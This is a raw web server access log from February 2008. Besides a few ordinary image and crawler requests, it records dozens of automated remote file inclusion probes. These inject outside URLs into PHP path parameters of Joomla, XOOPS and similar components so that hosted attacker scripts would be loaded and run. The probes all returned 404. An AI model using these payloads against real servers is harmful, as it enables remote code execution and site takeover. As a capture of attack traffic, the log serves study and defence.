206.16.144.243 - - [21/Feb/2008:11:02:42 -0800] "GET /bikes/dteel/2008_02_16/IMG_4547s.JPG HTTP/1.1" 200 300279 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
206.16.144.243 - - [21/Feb/2008:11:02:43 -0800] "GET /bikes/dteel/2008_02_16/IMG_4557s.JPG HTTP/1.1" 200 232435 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:11:03:56 -0800] "GET /logs/access_071220.log/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:11:03:56 -0800] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:11:04:09 -0800] "GET /logs/access_071230.log/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:11:04:12 -0800] "GET /logs/access_080131.log/index.php?pagina1=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:11:04:13 -0800] "GET /index.php?pagina1=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:11:04:13 -0800] "GET /logs/index.php?pagina1=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:11:04:43 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:11:04:44 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.145.50 - - [21/Feb/2008:11:04:45 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:11:05:07 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:11:05:39 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.52.234 - - [21/Feb/2008:11:05:49 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.162.122 - - [21/Feb/2008:11:06:34 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.3.76 - - [21/Feb/2008:11:06:38 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:11:06:44 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:11:06:44 -0800] "GET /config.php?path_to_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:11:06:45 -0800] "GET /logs/config.php?path_to_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.81 - - [21/Feb/2008:11:08:11 -0800] "GET /logs/access_071221.log HTTP/1.0" 200 167044 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:08:13 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:08:13 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:08:13 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:08:14 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:11:08:26 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.223.25.25 - - [21/Feb/2008:11:08:26 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:08:31 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:08:45 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:08:46 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.140.135.102 - - [21/Feb/2008:11:09:12 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:09:42 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:10:13 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [21/Feb/2008:11:10:29 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:10:33 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:11:10:55 -0800] "GET /index.php?pagina1=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.90.250 - - [21/Feb/2008:11:11:29 -0800] "GET /logs/access_080118.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:11:32 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:11:33 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:12:04 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:12:12 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:12:13 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:12:27 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:12:27 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.72.15 - - [21/Feb/2008:11:12:38 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [21/Feb/2008:11:12:41 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.72.15 - - [21/Feb/2008:11:12:43 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:13:23 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:13:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:13:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:13:27 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:14:06 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:14:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:14:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:14:10 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:14:55 -0800] "GET /logs/index.php?var=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:14:55 -0800] "GET /index.php?var=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:15:39 -0800] "GET //login.php?dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:11:15:39 -0800] "GET /logs//login.php?dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:15:59 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.216.110 - - [21/Feb/2008:11:16:08 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dynamiksolutions.com/web/templates/JavaBean/images/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.107.54.16 - - [21/Feb/2008:11:16:29 -0800] "GET /logs/access_080203.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.218 - - [21/Feb/2008:11:16:39 -0800] "GET /index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.myrated.info/cache/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.193.222.218 - - [21/Feb/2008:11:16:39 -0800] "GET /logs/index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.myrated.info/cache/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:11:16:51 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.87.60.4 - - [21/Feb/2008:11:16:54 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.antik-glas-huber.de/photokorn//images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:16:55 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:16:55 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:17:01 -0800] "GET //login.php?dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:17:02 -0800] "GET /logs//login.php?dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:17:28 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:17:31 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:17:32 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:17:32 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [21/Feb/2008:11:17:53 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:18:19 -0800] "GET /index.php?var=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:11:18:19 -0800] "GET /logs/index.php?var=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.21.152.2 - - [21/Feb/2008:11:18:28 -0800] "GET /logs/access_080105.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:18:48 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:18:49 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:18:49 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:18:50 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:18:50 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:18:51 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:18:54 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:18:54 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:19:12 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:19:22 -0800] "GET /logs/access_080211.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:19:22 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:19:22 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:11:19:39 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:19:39 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:11:19:40 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:11:19:40 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:11:19:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [21/Feb/2008:11:19:45 -0800] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.29.89.97 - - [21/Feb/2008:11:19:45 -0800] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:20:50 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:20:56 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:20:58 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:20:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:20:59 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:21:32 -0800] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [21/Feb/2008:11:21:33 -0800] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:11:21:37 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [21/Feb/2008:11:21:39 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.221.130 - - [21/Feb/2008:11:21:44 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:22:00 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:22:00 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:22:00 -0800] "GET /config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:22:05 -0800] "GET /config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:11:22:05 -0800] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:22:05 -0800] "GET /logs/config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.108.185.222 - - [21/Feb/2008:11:22:06 -0800] "GET /logs/config.php?path_to_root=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:11:22:09 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
